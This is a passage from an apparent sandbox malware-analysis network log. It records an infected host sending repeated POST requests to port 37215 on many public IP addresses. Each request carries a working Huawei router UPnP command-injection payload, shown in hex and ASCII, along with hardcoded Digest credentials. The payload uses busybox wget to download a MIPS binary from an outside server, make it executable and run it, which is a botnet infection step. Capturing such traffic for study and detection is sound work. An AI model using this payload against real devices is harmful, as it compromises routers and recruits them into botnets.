                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            747192.168.2.133750241.180.76.15637215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.719824076 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            748192.168.2.1338284156.46.144.1037215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.721224070 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            749192.168.2.135236841.222.92.21237215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.722392082 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            750192.168.2.1347500197.47.184.13237215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.723331928 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            751192.168.2.1352760197.28.22.18337215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.724796057 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            752192.168.2.1350012197.50.7.237215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.725895882 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            753192.168.2.1334468156.185.253.18437215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.726932049 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            754192.168.2.134468441.17.67.837215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.727943897 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            755192.168.2.136003841.46.72.24837215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.729371071 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            756192.168.2.1334008156.36.1.6737215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.730340004 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
